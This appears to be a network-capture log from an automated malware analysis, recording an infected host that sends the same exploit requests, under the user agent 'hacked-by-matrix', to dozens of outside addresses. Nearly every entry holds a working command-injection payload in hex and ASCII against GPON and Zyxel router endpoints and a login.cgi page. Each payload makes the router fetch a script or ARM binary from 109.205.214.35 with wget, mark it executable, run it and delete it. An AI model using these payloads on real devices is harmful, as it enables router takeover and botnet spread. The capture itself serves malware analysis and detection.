                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1930192.168.2.133573442.99.97.246443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826711893 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1931192.168.2.135100642.211.165.241443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826721907 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1932192.168.2.1342850118.230.171.107443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826744080 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1933192.168.2.1360092118.11.111.1443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826750040 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1934192.168.2.1357844118.239.49.47443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826788902 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1935192.168.2.13382985.253.136.142443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826844931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1936192.168.2.1344934118.119.65.84443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826853991 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1937192.168.2.133535842.221.212.114443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826854944 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1938192.168.2.134569442.148.88.232443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826854944 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1939192.168.2.1353286118.3.228.62443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826894045 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1940192.168.2.1336644212.130.61.4443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826909065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1941192.168.2.1359072118.116.63.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826982021 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1942192.168.2.1345524109.212.104.237443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826982975 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1943192.168.2.1343882212.85.202.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.826999903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1944192.168.2.1333414118.125.72.191443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.827022076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1945192.168.2.135841883.169.38.4580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.105535984 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1946192.168.2.1354204212.172.166.18980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.396972895 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:34.587234974 CET506INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 21 Mar 2024 04:23:33 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: keep-alive
                                                        Location: https:///login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$
                                                        Strict-Transport-Security: max-age=31536000;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1947192.168.2.1346724213.155.38.23080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.502836943 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:34.701927900 CET354INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 05:23:33 GMT
                                                        Server: webserver
                                                        Content-Length: 195
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /cgi-bin/ViewLog.asp</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1948192.168.2.1334656178.47.45.280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:34.505665064 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:34.733786106 CET259INHTTP/1.1 501 Not Implemented
                                                        Connection: Keep-Alive
                                                        Content-Length: 121
                                                        Date: Thu, 21 Mar 2024 04:23:34 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>
                                                        Mar 21, 2024 05:23:34.747684002 CET251INHTTP/1.0 503 unknown method
                                                        Connection: close
